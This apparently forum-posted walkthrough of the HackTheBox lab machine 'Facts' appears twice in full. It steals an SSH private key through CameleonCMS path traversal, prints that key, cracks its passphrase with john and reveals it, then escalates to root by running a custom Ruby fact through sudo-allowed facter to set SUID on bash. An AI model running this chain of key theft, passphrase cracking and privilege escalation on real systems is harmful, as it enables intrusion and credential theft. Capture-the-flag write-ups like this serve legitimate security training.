Yesterday, 01:52 PM
FACTS - HACKTHEBOX
LINUX - EASY
IP: 10.129.69.95 (ull have a different ip)
USERS (get w /etc/passwd)
-----
william
trivia
RECON
-----
nmap -sS -sV -sC -p- --min-rate=10000 -T5 --max-retries=2 --defeat-rst-ratelimit -Pn -oN nmap.txt 10.129.69.95
22/OpenSSH 9.9p1
80/nginx 1.26.3
- path traversal on CameleonCMS 2.9.0 (CVE-2024-46987) (base vulnerable version 2.8.0 but works on 2.9.0)
54321/http ?
EXPLOITATION
------------
grabbed /home/trivia/.ssh/id_ed25519 via path traversal:
http://facts.htb/admin/media/download_pr...id_ed25519
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABCd4lFW9D
oZ28sQDBe+ZIltAAAAGAAAAAEAAAAzAAAAC3NzaC1lZDI1NTE5AAAAILNlyBF4wULHGQax
bUqV/3L712nR8jkzuG2DHrCPy9r/AAAAoILU2uUq5EuFWxb49m7/O1r+jOXkqJFPDFW3Sx
64HaSutBpMBTpNIWf6RviD/iEjRXHM7dKr6LBzu6PiZ3iA82tlbhAKqfZ9WvWYINhYxiQL
G3jKAVqOn5q6D7s5NSxOe6mOW1d5fshHZXKBqqU3WOt9Wvh9/yCZovIhIRK7/GcXCZdTVY
1Mce3bg0ERwrOixPG5d0SvnvdSLvIzcvaI/+w=
-----END OPENSSH PRIVATE KEY-----
bruteforced the passphrase:
ssh2john id_ed25519 > hash.txt
john --wordlist=rockyou.txt hash.txt
password: dragonballz
ssh login as trivia:
ssh -i id_ed25519 trivia@facts.htb (password: dragonballz)
PRIVESC
-------
sudo -l shows /usr/bin/facter - exploited it to create SUID on bash
mkdir -p /tmp/.exploit/facter
cat > /tmp/.exploit/facter/root.rb << 'EOF'
Facter.add(:exploit) do
setcode do
system("chmod +s /bin/bash")
end
end
EOF
sudo /usr/bin/facter --custom-dir /tmp/.exploit/facter
/bin/bash -p
got root :)
LINUX - EASY
IP: 10.129.69.95 (ull have a different ip)
USERS (get w /etc/passwd)
-----
william
trivia
RECON
-----
nmap -sS -sV -sC -p- --min-rate=10000 -T5 --max-retries=2 --defeat-rst-ratelimit -Pn -oN nmap.txt 10.129.69.95
22/OpenSSH 9.9p1
80/nginx 1.26.3
- path traversal on CameleonCMS 2.9.0 (CVE-2024-46987) (base vulnerable version 2.8.0 but works on 2.9.0)
54321/http ?
EXPLOITATION
------------
grabbed /home/trivia/.ssh/id_ed25519 via path traversal:
http://facts.htb/admin/media/download_pr...id_ed25519
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABCd4lFW9D
oZ28sQDBe+ZIltAAAAGAAAAAEAAAAzAAAAC3NzaC1lZDI1NTE5AAAAILNlyBF4wULHGQax
bUqV/3L712nR8jkzuG2DHrCPy9r/AAAAoILU2uUq5EuFWxb49m7/O1r+jOXkqJFPDFW3Sx
64HaSutBpMBTpNIWf6RviD/iEjRXHM7dKr6LBzu6PiZ3iA82tlbhAKqfZ9WvWYINhYxiQL
G3jKAVqOn5q6D7s5NSxOe6mOW1d5fshHZXKBqqU3WOt9Wvh9/yCZovIhIRK7/GcXCZdTVY
1Mce3bg0ERwrOixPG5d0SvnvdSLvIzcvaI/+w=
-----END OPENSSH PRIVATE KEY-----
bruteforced the passphrase:
ssh2john id_ed25519 > hash.txt
john --wordlist=rockyou.txt hash.txt
password: dragonballz
ssh login as trivia:
ssh -i id_ed25519 trivia@facts.htb (password: dragonballz)
PRIVESC
-------
sudo -l shows /usr/bin/facter - exploited it to create SUID on bash
mkdir -p /tmp/.exploit/facter
cat > /tmp/.exploit/facter/root.rb << 'EOF'
Facter.add(:exploit) do
setcode do
system("chmod +s /bin/bash")
end
end
EOF
sudo /usr/bin/facter --custom-dir /tmp/.exploit/facter
/bin/bash -p
got root :)